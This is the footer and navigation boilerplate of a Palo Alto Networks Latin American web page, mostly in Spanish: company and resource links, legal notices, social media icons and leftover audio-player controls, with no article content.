* [Carreras](https://jobs.paloaltonetworks.com/en/)

* [Contáctenos](https://www.paloaltonetworks.com/company/contact-sales)

* [Responsabilidad corporativa](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Clientes](https://www.paloaltonetworks.lat/customers)

* [Relaciones con inversionistas](https://investors.paloaltonetworks.com/)

* [Ubicación](https://www.paloaltonetworks.com/about-us/locations)

* [Sala de prensa](https://www.paloaltonetworks.lat/company/newsroom)  
  Enlaces populares

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Comunidades](https://www.paloaltonetworks.com/communities)

* [Biblioteca de contenido](https://www.paloaltonetworks.lat/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Centro de eventos](https://events.paloaltonetworks.com/)

* [Administrar preferencias de correo electrónico](https://start.paloaltonetworks.com/preference-center)

* [Productos A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Certificaciones de productos](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [Informar sobre una vulnerabilidad](https://www.paloaltonetworks.com/security-disclosure)

* [Mapa del sitio](https://www.paloaltonetworks.com/sitemap)

* [Documentos técnicos](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [No vender ni compartir mi información personal](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.lat/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacidad](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Centro de confianza](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Condiciones de uso](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documentación](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. Todos los derechos reservados

* [![](https://www.paloaltonetworks.lat/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.lat/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.lat/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.lat/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.lat/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* LA  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
